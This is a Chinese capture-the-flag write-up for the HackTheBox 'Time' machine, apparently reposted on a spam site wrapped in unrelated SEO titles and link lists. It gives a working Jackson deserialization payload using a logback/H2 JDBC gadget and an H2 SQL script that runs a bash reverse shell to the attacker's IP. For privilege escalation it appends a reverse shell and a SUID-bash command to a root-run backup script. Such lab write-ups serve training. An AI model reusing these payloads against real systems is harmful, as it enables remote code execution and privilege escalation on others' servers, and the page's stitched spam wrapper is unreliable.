当前位置: 首页 > news >正文

文山党风廉政建设网站seo培训师

文山党风廉政建设网站,seo培训师,网站 左右浮动 广告,在网站里怎么做图片超链接HTB-Time 信息收集80端口 立足pericles -> root 信息收集 80端口 有两个功能,一个是美化JSON数据。 一个是验证JSON,并且输入{“abc”:“abc”}之类的会出现报错。 Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonPa…

HTB-Time

  • 信息收集
    • 80端口
  • 立足
  • pericles -> root

请添加图片描述

信息收集

在这里插入图片描述
在这里插入图片描述

80端口

在这里插入图片描述
有两个功能,一个是美化JSON数据。

在这里插入图片描述

一个是验证JSON,并且输入{“abc”:“abc”}之类的会出现报错。
在这里插入图片描述

Validation failed: Unhandled Java exception:
com.fasterxml.jackson.core.JsonParseException: Unexpected character
(‘’’ (code 39)): expected a valid value (number, String, array,
object, ‘true’, ‘false’ or ‘null’)

根据报错可知是java jackson的报错。有关java jackson的漏洞非常多。其中有一篇文章提到几个负载。

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.31:4443/~test"}]

在这里插入图片描述

立足

新建一个文件名为inject1.sql。

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.31/443 0>&1')

python开启http.server。然后在验证功能下输入:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.31:8000/inject1.sql'"}]

在这里插入图片描述

pericles -> root

pspy64可以看到有一个timer_backup.sh没几秒种就会运行一次。
在这里插入图片描述
内容如下:

#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

以及/usr/bin/systemctl restart web_backup.service
在这里插入图片描述
查找web_backup.service并查看内容:

find / -name web_backup.service -type f 2>/dev/null
/etc/systemd/system/web_backup.servicepericles@time:/tmp$ cat /etc/systemd/system/web_backup.service
[Unit]
Description=Creates backups of the website[Service]
ExecStart=/bin/bash /usr/bin/timer_backup.sh

因为隔几秒种会重启web_backup.service,web_backup.service服务又会运行/usr/bin/timer_backup.sh。

还有一个/bin/sh -c /usr/bin/systemctl restart timer_backup.timer,不过我暂时不需要,留在这备用。
在这里插入图片描述
我们能写入timer_backup.sh但是时间任务并没执行我写入的内容,可能还有时间任务先对timer_backup.sh进行重置再运行。顺序是某个东西启动web_backup.serviceweb_backup.service启动timer_backup.sh。但是我没找到那个东西是什么。所以我决定再尝试对timer_backup.sh追加写入试试。向末尾添加cp /bin/bash /tmp/bash;chmod u+s /tmp/bash后等待片刻后仍无任何成功迹象。写入reshell到/usr/bin/timer_backup.sh里能成功。

 echo -e '\nbash -i >& /dev/tcp/10.10.14.31/4443 0>&1' >> /usr/bin/timer_backup.sh

但是几秒钟后就没了。
在这里插入图片描述
可以用echo “chmod u+s /bin/bash” 修改/bin/bash,但为什么不能复制过来后再修改呢。
在这里插入图片描述
我不知道。
在这里插入图片描述

http://www.wangmingla.cn/news/68390.html

相关文章:

  • 蓝色大气网站欣赏推广广告
  • 电商网站的功能百度首页纯净版怎么设置
  • 哪些域名不能够做淘宝客网站百度快速优化软件排名
  • 福州专业建站真正永久免费的建站系统有哪些
  • 如何引用404做网站品牌网络营销推广方案策划
  • 梅州网站建设baidu百度竞价推广技巧
  • 本地网站更新不了 vps登陆可以竞价账户托管的公司有哪些
  • 用数据库做学校网站长沙百度关键词搜索
  • 网站建设好吗刷僵尸粉网站推广
  • html教程视频教程福建搜索引擎优化
  • 传奇怎么做充值网站互联网推广怎么做
  • asp.net企业网站框架高级seo优化招聘
  • 深圳外贸网站公司推广平台排行榜app
  • 网站的后台松松软文
  • 做网站框架浏览时怎么变长推广普通话手抄报简单又好看
  • 江西 网站制作广州专做优化的科技公司
  • 怎样做网站首页的banner上海今天刚刚发生的新闻
  • 百度搜不倒公司网站hao123网址大全浏览器设为主页
  • 湖州市交通建设管理局网站佛山做seo推广公司
  • 建设网站的原则推广方案有哪些
  • 工具用具使用费是指企业施工生产青岛网络优化代理
  • 中国设计师联盟网站杭州百度推广开户
  • 做化工的有哪些网站河南郑州网站推广优化外包
  • 假网站连接怎么做的营销型网站的分类不包含
  • 网站建设风险的特征今日国内最新新闻
  • wordpress 动态网站模板产品50个关键词
  • 哪个网站平面设计做的好如何优化关键词搜索
  • 帮别人建网站赚钱吗产品推广策划方案
  • 网架加工图整站优化和单词
  • 做网站生意旁昆明seo工资